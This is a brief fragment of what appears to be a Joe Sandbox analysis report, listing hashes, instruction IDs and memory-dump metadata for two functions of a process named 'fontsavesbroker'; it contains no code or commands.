                • Instruction ID: b99fff723b8044d4105a6c4d114eef5bcb8f0e1cc3c8ce5bb267afa81cceb448
                • Opcode Fuzzy Hash: 1038e454c1c1a2dfc0abafdae40b95744a7679b55e81dde3abd8c4275def21d0
                • Instruction Fuzzy Hash: B741B470E05A6E8FDBA4DF54C8947EDB7B1EF58312F0006AAD40DA72A1DB745A808F40
                Function 00007FFD9B77EBC6 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: "$A$L$\
                • API String ID: 0-4177883558
                • Opcode ID: a375f0655503b0383596b152bbc8bc5c5d5ea15410e298962526a4a027d878e4
                • Instruction ID: af910bfc830973e8ea2e5d7c0caf5b01936c728dd049e088a9b567ae03647054
                • Opcode Fuzzy Hash: a375f0655503b0383596b152bbc8bc5c5d5ea15410e298962526a4a027d878e4
                • Instruction Fuzzy Hash: 9641C570E0966D8BDB64DF54C894BEDB7B1FF58305F0046EAD40DA72A1CBB86A818F44